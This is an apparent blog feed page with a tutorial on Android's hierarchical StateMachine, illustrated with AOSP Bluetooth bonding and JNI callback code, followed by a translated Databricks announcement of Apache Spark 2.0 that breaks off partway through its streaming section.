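This state machine is a hierarchical state machine that processes messages. Each state is a <State> object and must implement <processMessage>; it may optionally implement <enter/exit/getName>. The <enter/exit> methods play the role of constructor and destructor and are used to initialize and clean up the state. <getName> returns the name of the state. The default implementation returns the class name, but returning the name of the instance may be preferable, especially when a state class has multiple instances.

Once the state machine has been created, <addState> is used to build the state hierarchy and <setInitialState> identifies the initial state. After construction the program calls <start>, which initializes and starts the state machine. The state machine's first action is to call <enter> for the initial state's whole hierarchy, starting from its eldest ancestor. This happens before any message is processed. In the example below, mP1.enter is called first and then mS1.enter. After that, messages sent to the state machine are processed by the current state, that is, by <mS1.processMessage>.

        mP1
       /   \
      mS2   mS1 ----> initial state

After the state machine has been created and started, messages are created with <obtainMessage> and sent with <sendMessage>. When the state machine receives a message, the current state's <processMessage> is called. In the example above, mS1.processMessage is invoked first. The state can use <transitionTo> to switch the current state to a new one.

Each state in the state machine has zero or one parent state. If a child state cannot handle a message, it returns false or NOT_HANDLED so that its parent handles the message instead. If a message is never handled, <unhandledMessage> is called as a last chance to process it.

When the state machine has finished all its processing it may call <transitionToHaltingState>. When the current <processMessage> returns, the state machine moves to <HaltingState> and calls <halting>. Any message subsequently sent to the state machine causes <haltedProcessMessage> to be invoked.

To stop the state machine completely, call <quit> or <quitNow>. These call <exit> on the current state and its parents, call <onQuitting>, and then exit the thread.

Because states are arranged in a hierarchy, transitioning to a new state causes current states to be exited and new states to be entered.

Two other methods a state may use are <deferMessage> and <sendMessageAtFrontOfQueue>. <sendMessageAtFrontOfQueue> places a message at the front of the queue rather than the back. <deferMessage> saves a message on a list until a transition to a new state is made, at which point all deferred messages are put at the front of the state machine's queue, oldest first. They are then processed by the new current state before any other messages.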
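
The queue ordering described above can be sketched with a double-ended queue. This is a toy model of the ordering only, not the Android implementation; the class `MessageQueue` and its method names are hypothetical stand-ins for the methods named in the text.

```python
from collections import deque


class MessageQueue:
    def __init__(self):
        self.queue = deque()  # pending messages, next one at the left
        self.deferred = []    # messages set aside until the next transition

    def send_message(self, msg):
        self.queue.append(msg)

    def send_message_at_front_of_queue(self, msg):
        self.queue.appendleft(msg)

    def defer_message(self, msg):
        self.deferred.append(msg)

    def on_transition(self):
        # Move deferred messages to the front, keeping the oldest first:
        # pushing them in reverse order leaves the oldest at the head.
        for msg in reversed(self.deferred):
            self.queue.appendleft(msg)
        self.deferred.clear()


q = MessageQueue()
q.send_message("later")
q.defer_message("first deferred")
q.defer_message("second deferred")
q.on_transition()
print(list(q.queue))
```

After the transition the new state sees the deferred messages in their original order, ahead of anything that was merely queued.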

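The following state machine with 8 states illustrates the process.

          mP0
         /   \
        mP1   mS0
       /   \
      mS2   mS1
     /  \    \
    mS3  mS4  mS5  ---> initial state

After the state machine is started with mS5 as the initial state, the active states are mP0, mP1, mS1 and mS5. When a message arrives, processMessage is tried in the order mS5, mS1, mP1, mP0, moving on to the parent each time a state returns false or NOT_HANDLED.

Suppose mS5 receives a message it can handle and decides during processing that the state must change. It calls transitionTo(mS4) and returns true or HANDLED. Immediately after processMessage returns, the state machine determines that the common parent of the two states is mP1. It then calls mS5.exit, mS1.exit, mS2.enter and mS4.enter. The new active states are mP0, mP1, mS2 and mS4, so when the next message arrives mS4.processMessage is invoked.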
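
The exit and enter sequence for this transition can be derived mechanically from the hierarchy. The sketch below is a simplified model of that bookkeeping, not the Android source: the `PARENT` table encodes the diagram above, and special cases such as transitioning to the current state are ignored.

```python
# Parent of each state, taken from the 8-state diagram (None marks the root).
PARENT = {
    "mP0": None, "mP1": "mP0", "mS0": "mP0",
    "mS2": "mP1", "mS1": "mP1",
    "mS3": "mS2", "mS4": "mS2", "mS5": "mS1",
}


def active_path(state):
    # States that are active when `state` is current, root first.
    path = []
    while state is not None:
        path.append(state)
        state = PARENT[state]
    return path[::-1]


def transition(src, dst):
    src_path, dst_path = active_path(src), active_path(dst)
    common = 0
    while (common < min(len(src_path), len(dst_path))
           and src_path[common] == dst_path[common]):
        common += 1
    exits = src_path[common:][::-1]  # leave the deepest state first
    enters = dst_path[common:]       # enter from the top down
    return exits, enters


print(active_path("mS5")[::-1])  # order in which processMessage is tried
print(transition("mS5", "mS4"))
```

States shared by both paths, here mP0 and mP1, are neither exited nor entered, which is what keeps a transition between siblings cheap.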

Below is a hello world example.

class HelloWorld extends StateMachine {
   HelloWorld(String name) {
        super(name);
        addState(mState1);
        setInitialState(mState1);
    }

    public static HelloWorld makeHelloWorld() {
        HelloWorld hw = new HelloWorld("hw");
        hw.start();
        return hw;
    }

    class State1 extends State {
        @Override public boolean processMessage(Message message) {
            log("Hello World");
            return HANDLED;
            }
    }
    State1 mState1 = new State1();
}

void testHelloWorld() {
    HelloWorld hw = makeHelloWorld();
    hw.sendMessage(hw.obtainMessage());
}

The Bluetooth code uses a state machine in BondStateMachine.java.

final class BondStateMachine extends StateMachine {
...
// The constructor is private, so outside code cannot create a BondStateMachine with new.
private BondStateMachine(AdapterService service,
            AdapterProperties prop, RemoteDevices remoteDevices) {
        super("BondStateMachine:");
        addState(mStableState);
        addState(mPendingCommandState);
        mRemoteDevices = remoteDevices;
        mAdapterService = service;
        mAdapterProperties = prop;
        mAdapter = BluetoothAdapter.getDefaultAdapter();
        setInitialState(mStableState);
    }
// Public factory method: objects are created through make
    public static BondStateMachine make(AdapterService service,
            AdapterProperties prop, RemoteDevices remoteDevices) {
        Log.d(TAG, "make");
        BondStateMachine bsm = new BondStateMachine(service, prop, remoteDevices);
        bsm.start();
        return bsm;
    }

...
 private class StableState extends State {
        @Override
        public void enter() {
            infoLog("StableState(): Entering Off State");
        }

        @Override
        public boolean processMessage(Message msg) {

            BluetoothDevice dev = (BluetoothDevice)msg.obj;

            switch(msg.what) {

              case CREATE_BOND:
                  createBond(dev, msg.arg1, true);
                  break;
              case REMOVE_BOND:
                  removeBond(dev, true);
                  break;
              case BONDING_STATE_CHANGE:
                int newState = msg.arg1;
                /* if incoming pairing, transition to pending state */
                if (newState == BluetoothDevice.BOND_BONDING)
                {
                    sendIntent(dev, newState, 0);
                    transitionTo(mPendingCommandState);
                }
                else if (newState == BluetoothDevice.BOND_NONE)
                {
                    /* if the link key was deleted by the stack */
                    sendIntent(dev, newState, 0);
                }
                else
                {
                    Log.e(TAG, "In stable state, received invalid newState: " + newState);
                }
                break;

              case CANCEL_BOND:
              default:
                   Log.e(TAG, "Received unhandled state: " + msg.what);
                   return false;
            }
            return true;
        }
    }


    private class PendingCommandState extends State {
        private final ArrayList<BluetoothDevice> mDevices =
            new ArrayList<BluetoothDevice>();

        @Override
        public void enter() {
            infoLog("Entering PendingCommandState State");
            BluetoothDevice dev = (BluetoothDevice)getCurrentMessage().obj;
        }

        @Override
        public boolean processMessage(Message msg) {

            BluetoothDevice dev = (BluetoothDevice)msg.obj;
            DeviceProperties devProp = mRemoteDevices.getDeviceProperties(dev);
            boolean result = false;
             if (mDevices.contains(dev) && msg.what != CANCEL_BOND &&
                   msg.what != BONDING_STATE_CHANGE && msg.what != SSP_REQUEST &&
                   msg.what != PIN_REQUEST) {
                 deferMessage(msg);
                 return true;
             }

            Intent intent = new Intent(BluetoothDevice.ACTION_PAIRING_REQUEST);

            switch (msg.what) {
                case CREATE_BOND:
                    result = createBond(dev, msg.arg1, false);
                    break;
                case REMOVE_BOND:
                    result = removeBond(dev, false);
                    break;
                case CANCEL_BOND:
                    result = cancelBond(dev);
                    break;
                case BONDING_STATE_CHANGE:
                    int newState = msg.arg1;
                    int reason = getUnbondReasonFromHALCode(msg.arg2);
                    sendIntent(dev, newState, reason);
                    if(newState != BluetoothDevice.BOND_BONDING )
                    {
                        /* this is either none/bonded, remove and transition */
                        result = !mDevices.remove(dev);
                        if (mDevices.isEmpty()) {
                            // Whenever mDevices is empty, then we need to
                            // set result=false. Else, we will end up adding
                            // the device to the list again. This prevents us
                            // from pairing with a device that we just unpaired
                            result = false;
                            transitionTo(mStableState);
                        }
                        if (newState == BluetoothDevice.BOND_NONE)
                        {
                            mAdapterService.setPhonebookAccessPermission(dev,
                                    BluetoothDevice.ACCESS_UNKNOWN);
                            mAdapterService.setMessageAccessPermission(dev,
                                    BluetoothDevice.ACCESS_UNKNOWN);
                            mAdapterService.setSimAccessPermission(dev,
                                    BluetoothDevice.ACCESS_UNKNOWN);
                            // Set the profile Priorities to undefined
                            clearProfilePriorty(dev);
                        }
                        else if (newState == BluetoothDevice.BOND_BONDED)
                        {
                           // Do not set profile priority
                           // Profile priority should be set after SDP completion

                           // Restore the profile priorty settings
                           //setProfilePriorty(dev);
                        }
                    }
                    else if(!mDevices.contains(dev))
                        result=true;
                    break;
                case SSP_REQUEST:
                    int passkey = msg.arg1;
                    int variant = msg.arg2;
                    sendDisplayPinIntent(devProp.getAddress(), passkey, variant);
                    break;
                case PIN_REQUEST:
                    BluetoothClass btClass = dev.getBluetoothClass();
                    int btDeviceClass = btClass.getDeviceClass();
                    if (btDeviceClass == BluetoothClass.Device.PERIPHERAL_KEYBOARD ||
                         btDeviceClass == BluetoothClass.Device.PERIPHERAL_KEYBOARD_POINTING) {
                        // Its a keyboard. Follow the HID spec recommendation of creating the
                        // passkey and displaying it to the user. If the keyboard doesn't follow
                        // the spec recommendation, check if the keyboard has a fixed PIN zero
                        // and pair.
                        //TODO: Maintain list of devices that have fixed pin
                        // Generate a variable 6-digit PIN in range of 100000-999999
                        // This is not truly random but good enough.
                        int pin = 100000 + (int)Math.floor((Math.random() * (999999 - 100000)));
                        sendDisplayPinIntent(devProp.getAddress(), pin,
                                 BluetoothDevice.PAIRING_VARIANT_DISPLAY_PIN);
                        break;
                    }

                    if (msg.arg2 == 1) { // Minimum 16 digit pin required here
                        sendDisplayPinIntent(devProp.getAddress(), 0,
                                BluetoothDevice.PAIRING_VARIANT_PIN_16_DIGITS);
                    } else {
                        // In PIN_REQUEST, there is no passkey to display.So do not send the
                        // EXTRA_PAIRING_KEY type in the intent( 0 in SendDisplayPinIntent() )
                        sendDisplayPinIntent(devProp.getAddress(), 0,
                                              BluetoothDevice.PAIRING_VARIANT_PIN);
                    }

                    break;
                default:
                    Log.e(TAG, "Received unhandled event:" + msg.what);
                    return false;
            }
            if (result) mDevices.add(dev);

            return true;
        }
    }

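Two states are implemented, StableState and PendingCommandState, each with its own enter and processMessage methods. The BondStateMachine constructor adds both states.

        addState(mStableState);
        addState(mPendingCommandState);

It then uses setInitialState to make mStableState the initial state.

setInitialState(mStableState);

After construction, start is called to start the state machine.

        bsm.start();

Once start has been called, the enter method of the initial state (and of its ancestors, if it had any) is invoked.

Next comes creating and sending messages: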

    void bondStateChangeCallback(int status, byte[] address, int newState) {
        BluetoothDevice device = mRemoteDevices.getDevice(address);

        if (device == null) {
            infoLog("No record of the device:" + device);
            // This device will be added as part of the BONDING_STATE_CHANGE intent processing
            // in sendIntent above
            device = mAdapter.getRemoteDevice(Utils.getAddressStringFromByte(address));
        }

        infoLog("bondStateChangeCallback: Status: " + status + " Address: " + device
                + " newState: " + newState);

        Message msg = obtainMessage(BONDING_STATE_CHANGE);
        msg.obj = device;

        if (newState == BOND_STATE_BONDED)
            msg.arg1 = BluetoothDevice.BOND_BONDED;
        else if (newState == BOND_STATE_BONDING)
            msg.arg1 = BluetoothDevice.BOND_BONDING;
        else
            msg.arg1 = BluetoothDevice.BOND_NONE;
        msg.arg2 = status;

        sendMessage(msg);
    }
    void sspRequestCallback(byte[] address, byte[] name, int cod, int pairingVariant,
            int passkey) {
        //TODO(BT): Get wakelock and update name and cod
        BluetoothDevice bdDevice = mRemoteDevices.getDevice(address);
        if (bdDevice == null) {
            mRemoteDevices.addDeviceProperties(address);
        }
        infoLog("sspRequestCallback: " + address + " name: " + name + " cod: " +
                cod + " pairingVariant " + pairingVariant + " passkey: " + passkey);
        int variant;
        boolean displayPasskey = false;
        switch(pairingVariant) {

            case AbstractionLayer.BT_SSP_VARIANT_PASSKEY_CONFIRMATION :
                variant = BluetoothDevice.PAIRING_VARIANT_PASSKEY_CONFIRMATION;
                displayPasskey = true;
            break;

            case AbstractionLayer.BT_SSP_VARIANT_CONSENT :
                variant = BluetoothDevice.PAIRING_VARIANT_CONSENT;
            break;

            case AbstractionLayer.BT_SSP_VARIANT_PASSKEY_ENTRY :
                variant = BluetoothDevice.PAIRING_VARIANT_PASSKEY;
            break;

            case AbstractionLayer.BT_SSP_VARIANT_PASSKEY_NOTIFICATION :
                variant = BluetoothDevice.PAIRING_VARIANT_DISPLAY_PASSKEY;
                displayPasskey = true;
            break;

            default:
                errorLog("SSP Pairing variant not present");
                return;
        }
        BluetoothDevice device = mRemoteDevices.getDevice(address);
        if (device == null) {
           warnLog("Device is not known for:" + Utils.getAddressStringFromByte(address));
           mRemoteDevices.addDeviceProperties(address);
           device = mRemoteDevices.getDevice(address);
        }

        Message msg = obtainMessage(SSP_REQUEST);
        msg.obj = device;
        if(displayPasskey)
            msg.arg1 = passkey;
        msg.arg2 = variant;
        sendMessage(msg);
    }

    void pinRequestCallback(byte[] address, byte[] name, int cod, boolean min16Digits) {
        //TODO(BT): Get wakelock and update name and cod

        BluetoothDevice bdDevice = mRemoteDevices.getDevice(address);
        if (bdDevice == null) {
            mRemoteDevices.addDeviceProperties(address);
        }
        infoLog("pinRequestCallback: " + address + " name:" + name + " cod:" +
                cod);

        Message msg = obtainMessage(PIN_REQUEST);
        msg.obj = bdDevice;
        msg.arg2 = min16Digits ? 1 : 0; // Use arg2 to pass the min16Digit boolean

        sendMessage(msg);
    }

The three methods above are called from the native layer, which invokes them as needed to notify the Java layer at the top of the stack.
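
The hand-off in these callbacks can be pictured with a minimal sketch in plain Java. It does not use Android's StateMachine or Message classes: MiniStateMachine, Msg and the constant values are hypothetical stand-ins, assumed only for illustration. The point is that the callback merely packs its arguments into a message and queues it, and the state machine handles it later.

```java
import java.util.ArrayDeque;
import java.util.ArrayList;
import java.util.List;
import java.util.Queue;

// Hypothetical stand-in for the bond state machine: callbacks enqueue, a loop dispatches.
final class MiniStateMachine {
    static final int PIN_REQUEST = 1; // illustrative values, not the AOSP constants
    static final int SSP_REQUEST = 2;

    // Hypothetical stand-in for android.os.Message: a code plus a small payload.
    static final class Msg {
        final int what;
        Object obj;
        int arg1;
        int arg2;

        Msg(int what) {
            this.what = what;
        }
    }

    private final Queue<Msg> queue = new ArrayDeque<>();
    final List<String> handled = new ArrayList<>();

    Msg obtainMessage(int what) {
        return new Msg(what);
    }

    void sendMessage(Msg msg) {
        queue.add(msg);
    }

    // Same shape as pinRequestCallback: pack the arguments, then queue the message.
    void pinRequestCallback(String device, boolean min16Digits) {
        Msg msg = obtainMessage(PIN_REQUEST);
        msg.obj = device;
        msg.arg2 = min16Digits ? 1 : 0;
        sendMessage(msg);
    }

    // Drain the queue and dispatch on the message code, as a state's handler would.
    void processAll() {
        Msg msg;
        while ((msg = queue.poll()) != null) {
            switch (msg.what) {
                case PIN_REQUEST:
                    handled.add("PIN_REQUEST " + msg.obj + " min16Digits=" + (msg.arg2 == 1));
                    break;
                case SSP_REQUEST:
                    handled.add("SSP_REQUEST " + msg.obj + " variant=" + msg.arg2);
                    break;
                default:
                    handled.add("unknown " + msg.what);
            }
        }
    }

    public static void main(String[] args) {
        MiniStateMachine sm = new MiniStateMachine();
        sm.pinRequestCallback("00:11:22:33:44:55", true);
        sm.processAll();
        System.out.println(sm.handled);
    }
}
```

Queuing the request instead of handling it inline keeps the native callback short and lets the state machine process events one at a time in arrival order.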

<./packages/apps/Bluetooth/src/com/android/bluetooth/btservice/JniCallbacks.java>
final class JniCallbacks {
..
    void pinRequestCallback(byte[] address, byte[] name, int cod, boolean min16Digits) {
        mBondStateMachine.pinRequestCallback(address, name, cod, min16Digits);
    }

    void bondStateChangeCallback(int status, byte[] address, int newState) {
        mBondStateMachine.bondStateChangeCallback(status, address, newState);
    }
...
}

For example:

 《packages/apps/Bluetooth/jni/com_android_bluetooth_btservice_AdapterService.cpp》
static void bond_state_changed_callback(bt_status_t status, bt_bdaddr_t *bd_addr,
                                        bt_bond_state_t state) {
    jbyteArray addr;
    int i;
    if (!checkCallbackThread()) {
       ALOGE("Callback: '%s' is not called on the correct thread", __FUNCTION__);
       return;
    }
    if (!bd_addr) {
        ALOGE("Address is null in %s", __FUNCTION__);
        return;
    }
    addr = callbackEnv->NewByteArray(sizeof(bt_bdaddr_t));
    if (addr == NULL) {
       ALOGE("Address allocation failed in %s", __FUNCTION__);
       return;
    }
    callbackEnv->SetByteArrayRegion(addr, 0, sizeof(bt_bdaddr_t), (jbyte *)bd_addr);

    // 3. Call the Java method
    callbackEnv->CallVoidMethod(sJniCallbacksObj, method_bondStateChangeCallback, (jint) status,
                                addr, (jint)state);
    checkAndClearExceptionFromCallback(callbackEnv, __FUNCTION__);
    callbackEnv->DeleteLocalRef(addr);
}

static void classInitNative(JNIEnv* env, jclass clazz) {
    int err;
    hw_module_t* module;

    // 1. Look up the Java class by name (much like Java reflection)
    jclass jniCallbackClass =
        env->FindClass("com/android/bluetooth/btservice/JniCallbacks");
    sJniCallbacksField = env->GetFieldID(clazz, "mJniCallbacks",
        "Lcom/android/bluetooth/btservice/JniCallbacks;");

    // 2. Look up the methods of that Java class
    method_stateChangeCallback = env->GetMethodID(jniCallbackClass, "stateChangeCallback", "(I)V");

    method_adapterPropertyChangedCallback = env->GetMethodID(jniCallbackClass,
                                                             "adapterPropertyChangedCallback",
                                                             "([I[[B)V");
    method_discoveryStateChangeCallback = env->GetMethodID(jniCallbackClass,
                                                           "discoveryStateChangeCallback", "(I)V");

    method_devicePropertyChangedCallback = env->GetMethodID(jniCallbackClass,
                                                            "devicePropertyChangedCallback",
                                                            "([B[I[[B)V");
    method_deviceFoundCallback = env->GetMethodID(jniCallbackClass, "deviceFoundCallback", "([B)V");
    method_pinRequestCallback = env->GetMethodID(jniCallbackClass, "pinRequestCallback",
                                                 "([B[BIZ)V");
    method_sspRequestCallback = env->GetMethodID(jniCallbackClass, "sspRequestCallback",
                                                 "([B[BIII)V");

    method_bondStateChangeCallback = env->GetMethodID(jniCallbackClass,
                                                     "bondStateChangeCallback", "(I[BI)V");

    method_aclStateChangeCallback = env->GetMethodID(jniCallbackClass,
                                                    "aclStateChangeCallback", "(I[BI)V");
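
The signature strings passed to GetMethodID are JVM method descriptors. As a quick cross-check, the sketch below rebuilds three of them from the Java parameter types shown earlier, using the standard java.lang.invoke.MethodType class. The class name JniDescriptorDemo and the helper descriptor are made up for this illustration.

```java
import java.lang.invoke.MethodType;

final class JniDescriptorDemo {
    // Builds the JVM descriptor for a method with the given return and parameter types.
    static String descriptor(Class<?> returnType, Class<?>... paramTypes) {
        return MethodType.methodType(returnType, paramTypes).toMethodDescriptorString();
    }

    public static void main(String[] args) {
        // void pinRequestCallback(byte[] address, byte[] name, int cod, boolean min16Digits)
        System.out.println(descriptor(void.class, byte[].class, byte[].class, int.class, boolean.class));
        // void sspRequestCallback(byte[] address, byte[] name, int cod, int pairingVariant, int passkey)
        System.out.println(descriptor(void.class, byte[].class, byte[].class, int.class, int.class, int.class));
        // void bondStateChangeCallback(int status, byte[] address, int newState)
        System.out.println(descriptor(void.class, int.class, byte[].class, int.class));
    }
}
```

In a descriptor, [B is byte[], I is int, Z is boolean and the trailing V is a void return, so the three lines printed match the strings used for pinRequestCallback, sspRequestCallback and bondStateChangeCallback in the native code.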

static JNINativeMethod sMethods[] = {
    /* name, signature, funcPtr */
    {"classInitNative", "()V", (void *) classInitNative},
    {"initNative", "()Z", (void *) initNative},
    {"cleanupNative", "()V", (void*) cleanupNative},
    {"enableNative", "()Z", (void*) enableNative},
    {"disableNative", "()Z", (void*) disableNative},
    {"setAdapterPropertyNative", "(I[B)Z", (void*) setAdapterPropertyNative},
    {"getAdapterPropertiesNative", "()Z", (void*) getAdapterPropertiesNative},
    {"getAdapterPropertyNative", "(I)Z", (void*) getAdapterPropertyNative},
    {"getDevicePropertyNative", "([BI)Z", (void*) getDevicePropertyNative},
    {"setDevicePropertyNative", "([BI[B)Z", (void*) setDevicePropertyNative},
    {"startDiscoveryNative", "()Z", (void*) startDiscoveryNative},
    {"cancelDiscoveryNative", "()Z", (void*) cancelDiscoveryNative},
    {"createBondNative", "([BI)Z", (void*) createBondNative},
    {"removeBondNative", "([B)Z", (void*) removeBondNative},
    {"cancelBondNative", "([B)Z", (void*) cancelBondNative},
    {"getConnectionStateNative", "([B)I", (void*) getConnectionStateNative},
    {"pinReplyNative", "([BZI[B)Z", (void*) pinReplyNative},
    {"sspReplyNative", "([BIZI)Z", (void*) sspReplyNative},
    {"getRemoteServicesNative", "([B)Z", (void*) getRemoteServicesNative},
    {"connectSocketNative", "([BI[BII)I", (void*) connectSocketNative},
    {"createSocketChannelNative", "(ILjava/lang/String;[BII)I",
     (void*) createSocketChannelNative},
    {"configHciSnoopLogNative", "(Z)Z", (void*) configHciSnoopLogNative},
    {"alarmFiredNative", "()V", (void *) alarmFiredNative},
    {"readEnergyInfo", "()I", (void*) readEnergyInfo},
    {"dumpNative", "(Ljava/io/FileDescriptor;)V", (void*) dumpNative},
    {"factoryResetNative", "()Z", (void*)factoryResetNative}
};

int register_com_android_bluetooth_btservice_AdapterService(JNIEnv* env)
{
    return jniRegisterNativeMethods(env, "com/android/bluetooth/btservice/AdapterService",
                                    sMethods, NELEM(sMethods));
}

jint JNI_OnLoad(JavaVM *jvm, void *reserved)
{
    JNIEnv *e;
    int status;

    ALOGV("Bluetooth Adapter Service : loading JNI\n");

    // Check JNI version
    if (jvm->GetEnv((void **)&e, JNI_VERSION_1_6)) {
        ALOGE("JNI version mismatch error");
        return JNI_ERR;
    }

    if ((status = android::register_com_android_bluetooth_btservice_AdapterService(e)) < 0) {
        ALOGE("jni adapter service registration failure, status: %d", status);
        return JNI_ERR;
    }

...

Loading the JNI library

./Bluetooth/src/com/android/bluetooth/btservice/AdapterApp.java:34:        System.loadLibrary("bluetooth_jni");

As the line above shows, the JNI library is loaded in AdapterApp.

The Java layer can also send messages to the state machine:

 //packages/apps/Bluetooth/src/com/android/bluetooth/btservice/AdapterService.java    
     boolean createBond(BluetoothDevice device, int transport) {
        enforceCallingOrSelfPermission(BLUETOOTH_ADMIN_PERM,
            "Need BLUETOOTH ADMIN permission");
        DeviceProperties deviceProp = mRemoteDevices.getDeviceProperties(device);
        if (deviceProp != null && deviceProp.getBondState() != BluetoothDevice.BOND_NONE) {
            return false;
        }

        // Pairing is unreliable while scanning, so cancel discovery
        // Note, remove this when native stack improves
        cancelDiscoveryNative();

        Message msg = mBondStateMachine.obtainMessage(BondStateMachine.CREATE_BOND);
        msg.obj = device;
        msg.arg1 = transport;
        mBondStateMachine.sendMessage(msg);
        return true;
    }


    boolean removeBond(BluetoothDevice device) {
        enforceCallingOrSelfPermission(BLUETOOTH_ADMIN_PERM, "Need BLUETOOTH ADMIN permission");
        DeviceProperties deviceProp = mRemoteDevices.getDeviceProperties(device);
        if (deviceProp == null || deviceProp.getBondState() != BluetoothDevice.BOND_BONDED) {
            return false;
        }
        Message msg = mBondStateMachine.obtainMessage(BondStateMachine.REMOVE_BOND);
        msg.obj = device;
        mBondStateMachine.sendMessage(msg);
        return true;
    }

Author: shichaog, posted 2016/7/31 0:24:19

↧

Apache Spark 2.0 Officially Released

July 31, 2016, 12:35 am

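The following is a translation of the release announcement from the Databricks website:

We are proud to announce that Apache Spark 2.0 is available for download on Databricks as of July 26. This release builds on what the community has learned over the past two years, adding the features users asked for and fixing earlier pain points.

This post summarizes the three major themes of Spark 2.0: easier, faster, and smarter. A separate roundup of Spark 2.0 articles covers more of the details.

Two months ago, Databricks released a technical preview of Apache Spark 2.0. As the chart below shows, 10% of our clusters currently run this version. The release was shaped by customers' experience with the preview and their feedback, and Databricks is delighted to be the first commercial vendor of Spark 2.0.

[Figure: usage of each Apache Spark version over time]

Now let's take a closer look at what is new in Apache Spark 2.0.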

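Easier: ANSI SQL and a streamlined API

One thing Spark takes pride in is offering APIs that are simple, intuitive, and easy to use. Spark 2.0 continues this tradition and focuses on two areas:

Standard SQL support;
Unification of the DataFrame/Dataset API.

On the SQL side, we have significantly expanded Spark's SQL capabilities, introducing a new ANSI SQL parser and support for subqueries. Spark 2.0 can run all 99 TPC-DS queries, which require many SQL:2003 features. Because SQL is one of the main interfaces used by Spark applications, this expanded support greatly reduces the effort of porting legacy applications to Spark.

On the programming API side, we have streamlined the APIs:

Unified DataFrames and Datasets in Scala/Java: starting with Spark 2.0, DataFrame is just a type alias for a Dataset of Row. Both the typed methods (such as map, filter, and groupByKey) and the untyped methods (such as select and groupBy) are available on the Dataset class. This new Dataset interface is also the abstraction used for Structured Streaming. Because compile-time type safety is not a language feature of Python and R, the Dataset concept does not apply to those languages' APIs; there, DataFrame remains the primary programming abstraction, analogous to the single-node data frame notion in those languages. See the related notebooks and articles for more on these APIs.
SparkSession: a new entry point that replaces the old SQLContext and HiveContext. For users of the DataFrame API, a common source of confusion in Spark was which "context" to use. SparkSession now serves as a single entry point that covers both; a demo is linked from the original announcement. The old SQLContext and HiveContext are kept for backward compatibility.
A simpler, more performant Accumulator API: we designed a new Accumulator API with a simpler type hierarchy and specialized support for primitive types. The old Accumulator API is deprecated but retained for backward compatibility.
The DataFrame-based machine learning API becomes the primary ML API: in Spark 2.0, the spark.ml package and its "pipeline" APIs emerge as the primary machine learning API. The original spark.mllib package is preserved, but future development will focus on the DataFrame-based API.
Machine learning pipeline persistence: users can now save and load machine learning pipelines and models in every language Spark supports. See the related blog post for details and the accompanying notebook for examples.
Distributed algorithms in R: added support for Generalized Linear Models (GLM), Naive Bayes, Survival Regression, and K-Means.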

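Faster: Spark as a compiler

According to our 2015 Spark survey, 91% of users consider performance the most important aspect of Spark. Performance optimization has therefore always been a focus of Spark development. Before planning Spark 2.0, we asked ourselves a question: Spark is already fast, but can we push the boundaries and make it 10 times faster?

This question led us to rethink how we build Spark's physical execution layer. Look closely at a modern data engine, such as Spark or an MPP database, and you find that most CPU cycles are spent on useless work, such as making virtual function calls or reading and writing intermediate data to CPU cache or memory. Reducing the cycles wasted on this kind of work has long been a focus of modern compilers.

Spark 2.0 ships with the second-generation Tungsten engine. It is built on ideas from modern compilers and MPP databases and applies them to data processing. The main idea is to emit optimized bytecode at runtime that collapses the entire query into a single function, eliminating virtual function calls and keeping intermediate data in CPU registers. We call this technique "whole-stage code generation".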
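
To make the idea concrete, here is a toy comparison in plain Java. It is not Spark's generated code: RowIterator, Scan and Filter are hypothetical names for a classic iterator-style operator chain, and fusedSum is the kind of single loop that collapsing a query into one function aims for. Both compute the sum of the even numbers below n.

```java
import java.util.NoSuchElementException;

final class WholeStageSketch {
    // Iterator-style operator: every row costs interface calls on each operator.
    interface RowIterator {
        boolean hasNext();
        long next();
    }

    // Produces the values 0 .. n-1.
    static final class Scan implements RowIterator {
        private final long n;
        private long i = 0;
        Scan(long n) { this.n = n; }
        public boolean hasNext() { return i < n; }
        public long next() { return i++; }
    }

    // Passes through only the even values produced by its child.
    static final class Filter implements RowIterator {
        private final RowIterator child;
        private long pending;
        private boolean hasPending;
        Filter(RowIterator child) { this.child = child; }
        public boolean hasNext() {
            while (!hasPending && child.hasNext()) {
                long v = child.next();
                if (v % 2 == 0) { pending = v; hasPending = true; }
            }
            return hasPending;
        }
        public long next() {
            if (!hasNext()) throw new NoSuchElementException();
            hasPending = false;
            return pending;
        }
    }

    // Pulls rows through the operator chain one at a time and sums them.
    static long iteratorSum(long n) {
        RowIterator plan = new Filter(new Scan(n));
        long sum = 0;
        while (plan.hasNext()) {
            sum += plan.next();
        }
        return sum;
    }

    // The same query written as one loop: no operator objects, no interface calls,
    // and the running sum lives in a local variable.
    static long fusedSum(long n) {
        long sum = 0;
        for (long v = 0; v < n; v++) {
            if (v % 2 == 0) {
                sum += v;
            }
        }
        return sum;
    }

    public static void main(String[] args) {
        long n = 1_000_000L;
        System.out.println(iteratorSum(n) == fusedSum(n));
    }
}
```

The two methods return the same result; the difference is only in how much per-row overhead sits between the data and the arithmetic.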

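To compare Spark 1.6 with Spark 2.0, we measured the time (in nanoseconds) it takes to process one row on a single core; the table below lists the improvements in Spark 2.0. Spark 1.6 already used code generation, a technique also found in some leading commercial databases today. As the numbers show, the new whole-stage code generation makes many operators an order of magnitude faster.

The accompanying notebook shows this in action: we ran aggregations and joins over 1 billion records on a single machine.

[Figure: cost per row (single thread)]

How does the new engine perform on end-to-end queries? We did some preliminary analysis using TPC-DS queries to compare Spark 1.6 and Spark 2.0:

[Figure: TPC-DS query comparison, Spark 1.6 vs. Spark 2.0]

Beyond this, we put a lot of work into improving the Catalyst optimizer for common query patterns such as nullability propagation, and into a new vectorized Parquet decoder whose throughput is three times higher. More details on the optimizations in Spark 2.0 are linked from the original announcement.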

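Smarter: Structured Streaming

As one of the first attempts to unify batch and stream processing, Spark Streaming has long been a leader in big data processing. The first streaming API, called DStream, was introduced in Spark 0.7 and gave developers several powerful properties: exactly-once semantics, fault tolerance at scale, and high throughput.

However, after working with hundreds of real-world Spark Streaming deployments, we found that applications that need to make decisions in real time often require more than just a streaming engine. They need deep integration of the batch and streaming stacks, integration with storage systems, and the ability to cope with changes in business logic. Enterprises therefore want more than a streaming engine: they want a full stack that lets them develop end-to-end "continuous applications".

Spark 2.0 addresses these use cases with a new API, Structured Streaming. Compared with existing streaming systems, Structured Streaming makes three key improvements:

An API integrated with batch jobs: to run a streaming computation, developers simply write a batch computation against the DataFrame/Dataset API, and Spark automatically runs it in streaming mode, that is, it updates the result as data arrives. With this design, developers do not have to manage state and failures by hand or keep the application in sync with batch jobs; the system takes care of all of that. In addition, the streaming job always gives the same answer as a batch job over the same data.
Transactional interaction with storage systems: Structured Streaming handles fault tolerance and consistency across the engine and the storage systems as a whole, which makes it easy to write applications that update a live database used for serving, join in static data, or move data reliably between storage systems.
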